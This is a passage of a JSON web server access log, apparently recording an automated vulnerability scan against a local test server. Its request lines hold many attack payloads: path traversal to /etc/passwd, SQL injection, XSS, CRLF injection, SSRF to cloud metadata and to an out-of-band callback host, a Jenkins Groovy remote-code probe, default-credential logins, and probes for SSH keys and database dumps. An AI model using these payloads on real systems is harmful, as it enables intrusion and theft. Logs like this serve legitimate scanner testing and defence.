HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /.%00./.%00./etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"{\x22query\x22:\x22# Welcome to GraphiQL\x5Cn#\x5Cn# GraphiQL is an in-browser tool for writing, validating, and\x5Cn# testing GraphQL queries.\x5Cn#\x5Cn# Type queries into this side of the screen, and you will see intelligent\x5Cn# typeaheads aware of the current GraphQL type schema and live syntax and\x5Cn# validation errors highlighted within the text.\x5Cn#\x5Cn# GraphQL queries typically start with a \x5C\x22{\x5C\x22 character. Lines that starts\x5Cn# with a # are ignored.\x5Cn#\x5Cn# An example GraphQL query might look like:\x5Cn#\x5Cn# {\x5Cn# field(arg: \x5C\x22value\x5C\x22) {\x5Cn# subField\x5Cn# }\x5Cn# }\x5Cn#\x5Cn# Keyboard shortcuts:\x5Cn#\x5Cn# Prettify Query: Shift-Ctrl-P (or press the prettify button above)\x5Cn#\x5Cn# Run Query: Ctrl-Enter (or press the play button above)\x5Cn#\x5Cn# Auto Complete: Ctrl-Space (or just start typing)\x5Cn#\x5Cn\x5Cn{\x5Cn users {\x5Cn nodes {\x5Cn id\x5Cn name\x5Cn username\x5Cn }\x5Cn }\x5Cn}\x22,\x22variables\x22:null,\x22operationName\x22:null}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/-/graphql-explorer", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/easy-wp-smtp/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"username=admin&password=admin&_submit_check=1&jlbqgb7g0x=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/idx-broker-platinum/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/page_start.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?pretty HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0DSet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gruntfile.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /localhost.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"AmLGYDCD","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /functionRouter HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/metadata/v1.json HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.213","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass=bnVjbGVp&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/cores?wt=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.tugboat HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login?!'> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_cat/indices?v HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/user/picker?query= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gruntfile.coffee HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"appno= 1 union SELECT 98989*443131,1&editor=cn&site=web","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysqldump.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appspec.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.018","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/authorized_keys HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=/admin/Index/index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/packages/security.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/log.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/start/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/systemstatus_inc_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysql.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appspec.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_/.ssh/authorized_keys HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jeecg-boot/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /general/status.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/config/security.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download?type=files&filename=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/tools/systemstatus_remote.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/systemstatus_inc_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /site.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://ca2tuc8smpv1g2s80ca0i6ss8ys5eydgw.oast.pro/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /~user/%0D%0ASet-Cookie:crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adm_program/system/redirect.php?url=javascript://%250aalert(document.domain) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 